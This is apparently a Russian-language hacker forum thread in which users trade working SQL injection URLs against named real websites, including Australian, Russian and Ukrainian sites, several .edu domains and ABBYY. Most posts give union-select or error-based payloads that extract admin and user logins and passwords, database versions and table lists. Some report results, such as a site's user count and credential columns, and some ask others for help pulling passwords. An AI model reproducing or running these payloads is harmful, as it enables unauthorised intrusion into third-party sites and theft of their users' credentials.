http://www.onlymelbourne.com.au/melbourne_details.php?id=-1+union+select+1,2,3,concat(admin_id,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+admin/* не смог подобрать имя юзверя http://www.gertrude.org.au/exhibition.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/* тут вообще хрен знает какая таблица http://www.defenceandindustry.com.au/category.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(username,char(58),password),0x17),0x17),4,5,6,7,8,9,10,11,12,13+from+users/* какие это юзеры - хрен знает http://www.strawtec.com.au/content.php?id=-1+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(concat(username,char(58),password),0x17),0x17),10,11,12+from+users/* тоже самое непонятно откуда пароли http://www.via-rs.net/acontece/index.php?inc=categoria&cod_categoria=-1+union+select+concat(mail,char(58),password)+from+survey_admin/*
вот такой вот ужаснейший скуль я нашел код: http://www.whoiswho.crimea.ua/view_org.php?record=-1385'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167/* и что с этим можно сделать?
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+database(),user(),version(),4,5,6,7,8,9,10/* .ud.rt - @l.ud.rt 4.1.20 http://www.gertrude.org.au/exhibition.php?id=-1+union+select+database(),2,version(),user(),5,6,7,8,9,10/* .ud.rt - .. 4.1.20 gertrude@localhost ______ сейчас дальше попробую раскопать..
Code: http://www.hww.ca/media_viewer2_top.asp?Language=E&id=203+OR+1=@@version Таблица 'HWW_VIEW_User_Accounts' Колонки
http://www.maup.com.ua/news/news.php?idn=-140+union+select+1,2,user(),database(),5,6,7,8,9,10,11,12,13/* Дальше не нарыл! Помогите
http://romanykultury.info/news/news.php?row=-168+union+select+1,user(),3,database(),5/* Нужно довести до ума
Что мешает, 5 мускул, доводи: Code: http://romanykultury.info/news/news.php?row=-168+union+select+1,table_name,3,4,5+from+information_schema.tables/*
Ну вот чуть "доведенная до ума" Тут пятый мускул. Остается только копаться в таблицах http://romanykultury.info/news/news.php?row=-168+union+select+1,table_name,3,4,5%20from%20information_schema.tables/* Пока писал кто-то раньше успел.... блин.
protermos.ru Code: http://www.protermos.ru/kvl.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,88,table_name,0,1,2,3,4,5,6,7,888,99,0,1,2,3,4,5,6,7,8888,9,0,1,2,3,4,5,6,7,88888,99,0,1,2+from+information_schema.tables/* version: 5.* tables: Code: CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS address_book address_format banners banners_history categories categories_description configuration configuration_group counter counter_history countries currencies customers customers_basket customers_basket_attributes customers_groups customers_info faqdesk faqdesk_categories faqdesk_categories_description faqdesk_configuration faqdesk_configuration_group faqdesk_description faqdesk_reviews faqdesk_reviews_description faqdesk_to_categories geo_zones languages manufacturers manufacturers_info newsdesk newsdesk_categories newsdesk_categories_description newsdesk_configuration newsdesk_configuration_group newsdesk_description newsdesk_reviews newsdesk_reviews_description newsdesk_to_categories newsletters orders orders_products orders_products_attributes orders_products_download orders_status orders_status_history orders_total phoroom_auth_access phoroom_banlist phoroom_categories phoroom_config phoroom_disallow phoroom_forum_prune phoroom_forums phoroom_groups phoroom_posts phoroom_posts_text phoroom_privmsgs phoroom_privmsgs_text phoroom_ranks phoroom_search_results phoroom_search_wordlist phoroom_search_wordmatch phoroom_sessions phoroom_smilies phoroom_themes phoroom_themes_name phoroom_topics phoroom_topics_watch phoroom_user_group phoroom_users phoroom_vote_desc phoroom_vote_results phoroom_vote_voters phoroom_words products products_attributes products_attributes_download products_description products_notifications products_options products_options_values products_options_values_to_products_options products_prop_options products_prop_options_values products_prop_options_values_to_products_prop_options products_properties products_to_categories proterm_pages proterm_pages_categories protherm_klo protherm_plo protherm_tlo reviews reviews_description sessions shablon_pages specials tax_class tax_rates whos_online zones zones_to_geo_zones
Code: http://www.[SIZE=4][COLOR=YellowGreen]opticalsorcery[/COLOR][/SIZE].com/view_tutorial.php?id=7%20union%20select%20concat(admin,char(58),pass,char(58),user,char(58),email,char(58),ID,char(58),website,char(58),firstname,char(58),lastname)%20from%20users/* 5.0.32-Debian_7 Code: http://www.iloveinns.com/recipes/list.php?id=7-0%20union%20select%201,version()/*
http://english.renaultclub.cz/english/links/novyodkaz.php?id=' Postorage SQL к сожелению в нем я не силен ( http://www.argelato.provincia.bologna.it/Statistica.asp?ID= Microsoft SQL
Киномост Code: http://www.kinomost.ru/index.asp?case=30&distr=-1'+OR+1=(SELECT+db_name())--&pack=0 Таблицы: db_ForumPeople, db_News, akter, akter_top
Сайт: d v g a m e s . r u Уязвимость: уязвим параметр dvglasid (Cookies) dvglasid=-1+union+select+1,2,concat(login,0x3a,password,0x3a,email)+from+users Enjoy
.edu код: http://www.brockport.edu/athletics/news.php?id=-495'+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* не смог подобрать ни одну таблицу
.edu код: http://www.music.uiuc.edu/facultyBio.php?id=-61+union+select+1,2,table_name,4+from+information_schema.tables/*
lib.web-malina.com "Самые интересные книги". Code: http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/* Code: http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/* таблица users. Code: http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,count(*),4,5,6,7,8,9+from+users/* 646 пользователей. Code: http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,concat_ws(0x3a,name,pass,email),3,4,5,6,7,8,9+from+users+limit+150,1/* Колонки name, pass, email.
.edu последний на сегодня код:http://www.ittc.ku.edu/view_project.phtml?id=-242+union+select+1,2,3,concat(version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* таблы не подбирал
ABBYY Code: http://www.abbyy.ru/press/press_releases.asp?param=-1+or+1=(select+db_name())-- http://www.abbyy.ru/sdk/?param=-1+or+1=(select+system_user)-- http://www.abbyy.com/press/press_releases.asp?param=136693+or+1=@@version-- Есть таблица user
Code: http://www.arb.ca.gov/lispub/rss/displaypost.php?pno=-573+union+select+1,2,3,table_name,5+from+INFORMATION_SCHEMA.TABLES+limit+23,1/*
edu не смог вывести пароли логины,кроме фамилий,имен и т.д код :http://fs.cs.fhm.edu/mitglieder.phtml?id=-48+union+select+1,concat(column_name,char(58),table_name),3,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.columns+limit+650,1/*
